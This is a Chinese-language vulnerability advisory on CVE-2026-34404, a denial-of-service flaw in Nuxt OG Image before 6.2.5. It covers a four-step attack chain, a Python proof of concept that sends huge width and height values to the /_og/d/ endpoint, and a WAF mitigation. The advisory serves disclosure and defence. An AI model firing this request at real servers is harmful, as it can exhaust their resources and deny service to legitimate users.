IPBUF安全漏洞报告
English
CVE-2026-34404 CVSS 7.5 高危

CVE-2026-34404 Nuxt OG Image 拒绝服务漏洞

披露日期: 2026-03-31

漏洞信息

漏洞编号
CVE-2026-34404
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Nuxt OG Image

相关标签

拒绝服务DoSNuxt资源耗尽CVE-2026-34404

漏洞概述

Nuxt OG Image在6.2.5之前的版本中存在拒绝服务漏洞。由于其图片生成接口未对宽度和高度参数进行限制,攻击者可通过构造包含超大参数的请求导致服务器资源耗尽,从而引发服务拒绝。该漏洞无需认证且在默认配置下即可复现,对服务可用性构成严重威胁。

技术细节

该漏洞源于 Nuxt OG Image 组件在处理图片渲染请求时缺乏对输入参数的有效校验。具体而言,受影响的端点 /_og/d/ 及旧版本的 /og-image/ 直接接收用户传入的 width 和 height 参数。攻击者可发送包含极大数值(如 9999999)的请求,服务器在尝试分配内存和计算资源以生成图像时,会因负载过高而崩溃或停止响应,导致合法用户无法访问服务。

攻击链分析

STEP 1
侦察
攻击者识别出目标网站使用了 Nuxt 框架并启用了 Nuxt OG Image 模块,确认存在 /_og/d/ 或 /og-image/ 接口。
STEP 2
漏洞探测
攻击者向上述接口发送特制的 HTTP GET 请求,其中包含宽度和高度参数。
STEP 3
漏洞利用
攻击者将 width 和 height 参数设置为极大的数值(如 99999999),发送恶意请求。
STEP 4
产生影响
服务器尝试处理超大尺寸的图像生成请求,导致内存或 CPU 资源耗尽,最终服务崩溃或失去响应。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_poc(url): """ PoC for CVE-2026-34404: Nuxt OG Image DoS Sends a request with excessive width/height to trigger resource exhaustion. """ target_url = f"{url.rstrip('/')}/_og/d/" # Payload with extreme dimensions to trigger DoS params = { "width": 99999999, "height": 99999999 } try: print(f"Sending request to: {target_url}") response = requests.get(target_url, params=params, timeout=10) print(f"Status Code: {response.status_code}") if response.status_code == 200 or response.status_code == 500: print("[!] Potential Vulnerability Detected: Server processed the request or errored out.") else: print("[-] Server may not be vulnerable or endpoint has changed.") except requests.exceptions.Timeout: print("[!] Request timed out: Possible successful Denial of Service triggered.") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": target = input("Enter target URL (e.g., http://localhost:3000): ") check_poc(target)

影响范围

Nuxt OG Image < 6.2.5

防御指南

临时缓解措施
在完成版本升级前,建议在网络边界设备(如 WAF 或负载均衡器)上配置规则,拦截对 /_og/d/ 路径的请求中包含非合理 width 或 height 数值的流量,以减轻攻击风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表